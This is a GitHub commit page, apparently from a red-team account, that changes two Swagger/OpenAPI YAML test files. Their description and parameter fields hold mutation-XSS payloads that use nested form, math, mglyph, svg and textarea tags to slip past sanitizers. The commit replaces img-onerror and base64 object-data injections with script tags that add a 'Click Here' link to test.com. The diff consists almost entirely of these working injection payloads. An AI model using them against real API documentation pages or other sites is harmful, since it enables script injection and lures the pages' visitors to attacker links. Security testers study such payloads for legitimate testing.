Skip to content

Commit

Permalink
Testing clickable payloads
Browse files Browse the repository at this point in the history
  • Loading branch information
@exploits
exploits committed Feb 19, 2024
1 parent 2a52f8e commit dcf2542
Show file tree
Hide file tree
Showing 2 changed files with 4 additions and 4 deletions.
4 changes: 2 additions & 2 deletions test.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ swagger: '2.0'
info:
title: Hello from the Red Team
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=document.write('<a href=\'http://test.com\'>http://test.com</a>') src=1>"></form>
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>var a=document.createElement('a');a.href='http://test.com';a.textContent='Click Here';document.body.appendChild(a);</script>"></form>
version: production
Expand All @@ -29,7 +29,7 @@ paths:
delete:
parameters:
- description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=document.write('<a href=\'http://test.com\'>http://test.com</a>') src=1>">
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>var a=document.createElement('a');a.href='http://test.com';a.textContent='Click Here';document.body.appendChild(a);</script>">
format: int64
Expand Down
4 changes: 2 additions & 2 deletions test2.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ swagger: '2.0'
info:
title: Hello from the Red Team
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><object data='data:text/html;base64,PGFhcmVmPSJodHRwOi8vdGVzdC5jb20iPmh0dHA6Ly90ZXN0LmNvbTwvYT4='></object>"></form>
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>var a=document.createElement('a');a.href='http://test.com';a.textContent='Click Here';document.body.appendChild(a);</script>"></form>
version: production
Expand All @@ -29,7 +29,7 @@ paths:
delete:
parameters:
- description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=document.write('<a href=\'http://test.com\'>http://test.com</a>') src=1>"></form>
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>var a=document.createElement('a');a.href='http://test.com';a.textContent='Click Here';document.body.appendChild(a);</script>"></form>
format: int64
Expand Down

0 comments on commit dcf2542

Please sign in to comment.